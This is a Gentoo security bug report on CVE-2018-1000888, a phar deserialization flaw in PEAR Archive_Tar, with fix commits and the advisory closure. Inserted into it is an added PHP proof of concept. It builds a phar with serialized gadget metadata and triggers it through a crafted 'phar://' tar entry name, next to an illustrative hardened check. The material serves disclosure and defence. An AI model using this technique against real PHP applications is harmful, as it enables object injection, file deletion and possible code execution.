Bug 675576 (CVE-2018-1000888)

Summary: <dev-php/PEAR-Archive_Tar-1.4.5: remote code execution vulnerability
Product: Gentoo Security
Reporter: Eddie Chapman <maracay>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: major
CC: php-bugs
Priority: High
Version: unspecified
Hardware: All
OS: Linux
URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000888
See Also: https://bugs.gentoo.org/show_bug.cgi?id=724520
Whiteboard: B1 [glsa+ cve]
Package list: dev-php/PEAR-Archive_Tar-1.4.5
Runtime testing required: ---

Description Eddie Chapman 2019-01-16 12:29:18 UTC
From MITRE CVE entry:

"PEAR Archive_Tar version 1.4.3 and earlier contains a CWE-502, CWE-915 vulnerability in the Archive_Tar class. There are several file operations with `$v_header['filename']` as parameter (such as file_exists, is_file, is_dir, etc). When extract is called without a specific prefix path, we can trigger unserialization by crafting a tar file with `phar://[path_to_malicious_phar_file]` as path. Object injection can be used to trigger destruct in the loaded PHP classes, e.g. the Archive_Tar class itself. With Archive_Tar object injection, arbitrary file deletion can occur because `@unlink($this->_temp_tarname)` is called. If another class with useful gadget is loaded, it may possible to cause remote code execution that can result in files being deleted or possibly modified. This vulnerability appears to have been fixed in 1.4.4."

Other references:
http://blog.pear.php.net/2018/12/20/security-vulnerability-announcement-archive_tar/
http://pear.php.net/package/Archive_Tar/download/
https://pear.php.net/bugs/bug.php?id=23782

Please note the vulnerability is reported as being fixed in 1.4.4, but 1.4.4 introduced a regression, so a further release (1.4.5) was made (see http://pear.php.net/bugs/bug.php?id=23788).

So of course the overall solution is to bump to the latest version 1.4.5.

Reproducible: Didn't try
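The mechanism the CVE text above describes, shown as an added PHP example that is not part of this bug report, of Archive_Tar or of the upstream fix: a tar entry name that begins with `phar://` is handed to `file_exists()`, PHP's phar stream wrapper opens the archive, and the archive's serialized metadata is unserialized, so the `__destruct` of whatever class is loaded runs. The `DemoGadget` class stands in for the Archive_Tar destructor (which, per the CVE text, unlinks `_temp_tarname`); the file names and the `hardened_extract_check()` regex are constructed for the demo, and that check is only an illustration of refusing stream-wrapper schemes in entry names, not the 1.4.4 patch. Building the phar needs `phar.readonly=0` (run with `php -d phar.readonly=0 demo.php`). On PHP 7.x the metadata is unserialized as soon as the phar is opened, so the gadget fires inside `file_exists()`; PHP 8.0 and later defer metadata unserialization until `Phar::getMetadata()` is called, so the vulnerable call prints nothing from the gadget there.

```php
<?php
// Added example, not code from the Gentoo bug or from Archive_Tar.
// Everything below (class, paths, regex) is constructed for the demo.
// Run with: php -d phar.readonly=0 demo.php

class DemoGadget {
    // Stand-in for a real gadget class such as Archive_Tar, whose
    // __destruct unlinks $this->_temp_tarname according to the CVE text.
    public $note = 'attacker-controlled metadata';
    public function __destruct() {
        echo "[gadget] __destruct ran with: {$this->note}\n";
    }
}

// Build a phar whose metadata is a serialized DemoGadget. This is what an
// attacker would ship (or upload) alongside the crafted tar archive.
function build_malicious_phar(string $path): void {
    @unlink($path);
    $phar = new Phar($path);               // needs phar.readonly=0
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'payload');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new DemoGadget());  // serialized into the manifest
    $phar->stopBuffering();
}

// Vulnerable pattern: the entry name from an untrusted tar header goes
// straight into a filesystem function. "phar://..." selects the phar
// stream wrapper, which unserializes the archive metadata on open (PHP 7).
function vulnerable_extract_check(string $entry_name): bool {
    return file_exists($entry_name);
}

// Hardened pattern (illustrative, not the upstream fix): refuse any entry
// name that starts with a stream-wrapper scheme before touching the
// filesystem. Wrappers only apply at the start of a path, so a prefix
// check is sufficient for this class of problem.
function hardened_extract_check(string $entry_name): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $entry_name)) {
        throw new RuntimeException(
            "refusing stream wrapper in tar entry name: $entry_name");
    }
    return file_exists($entry_name);
}

$phar_path = sys_get_temp_dir() . '/demo.phar';
build_malicious_phar($phar_path);

// The value an attacker would place in the tar header's filename field.
$crafted = "phar://$phar_path/x.txt";

echo "vulnerable: ";
var_dump(vulnerable_extract_check($crafted));  // gadget fires on PHP 7.x

echo "hardened: ";
try {
    hardened_extract_check($crafted);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}

unlink($phar_path);
```

The prefix check is the cheap mitigation for any extractor that does `file_exists`/`is_dir`/`is_file` on header-supplied names; the more robust one, which the CVE text alludes to with "without a specific prefix path", is to always join the entry name onto a trusted extraction directory before any filesystem call, so the string can never start with a wrapper scheme in the first place.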
Comment 1 Larry the Git Cow gentoo-dev 2019-01-16 14:57:16 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ca18a3ab3298533a4d2b035018f738f8cb4df5ad

commit ca18a3ab3298533a4d2b035018f738f8cb4df5ad
Author:     Brian Evans <grknight@gentoo.org>
AuthorDate: 2019-01-16 14:56:53 +0000
Commit:     Brian Evans <grknight@gentoo.org>
CommitDate: 2019-01-16 14:56:53 +0000

    dev-php/PEAR-Archive_Tar: Version bump for 1.4.5
    
    Bug: https://bugs.gentoo.org/675576
    Package-Manager: Portage-2.3.56, Repoman-2.3.12
    Signed-off-by: Brian Evans <grknight@gentoo.org>

 dev-php/PEAR-Archive_Tar/Manifest                  |  1 +
 .../PEAR-Archive_Tar/PEAR-Archive_Tar-1.4.5.ebuild | 31 ++++++++++++++++++++++
 2 files changed, 32 insertions(+)
Comment 2 Brian Evans (RETIRED) gentoo-dev 2019-01-16 15:00:27 UTC
Please test and mark stable

As this is pure PHP text code, the ALLARCHES policy applies
Comment 3 Thomas Deutschmann (RETIRED) gentoo-dev 2019-01-24 22:26:31 UTC
All arches done.
Comment 4 Larry the Git Cow gentoo-dev 2019-01-24 23:30:25 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=5a158d06fe1dca9963ddbf792635adcbae1f6f73

commit 5a158d06fe1dca9963ddbf792635adcbae1f6f73
Author:     Brian Evans <grknight@gentoo.org>
AuthorDate: 2019-01-24 23:30:11 +0000
Commit:     Brian Evans <grknight@gentoo.org>
CommitDate: 2019-01-24 23:30:11 +0000

    dev-php/PEAR-Archive_Tar: Drop vulnerable version
    
    Bug: https://bugs.gentoo.org/675576
    Package-Manager: Portage-2.3.57, Repoman-2.3.12
    Signed-off-by: Brian Evans <grknight@gentoo.org>

 dev-php/PEAR-Archive_Tar/Manifest                  |  1 -
 .../PEAR-Archive_Tar/PEAR-Archive_Tar-1.4.3.ebuild | 31 ----------------------
 2 files changed, 32 deletions(-)
Comment 5 Yury German Gentoo Infrastructure gentoo-dev 2019-03-11 02:08:37 UTC
Arches and Maintainer(s), Thank you for your work.
New GLSA Request filed.
Comment 6 NATTkA bot gentoo-dev Security 2020-04-06 15:16:39 UTC
Resetting sanity check; keywords are not fully specified and arches are not CC-ed.
Comment 7 GLSAMaker/CVETool Bot gentoo-dev 2020-06-15 15:46:44 UTC
This issue was resolved and addressed in
 GLSA 202006-14 at https://security.gentoo.org/glsa/202006-14
by GLSA coordinator Aaron Bauman (b-man).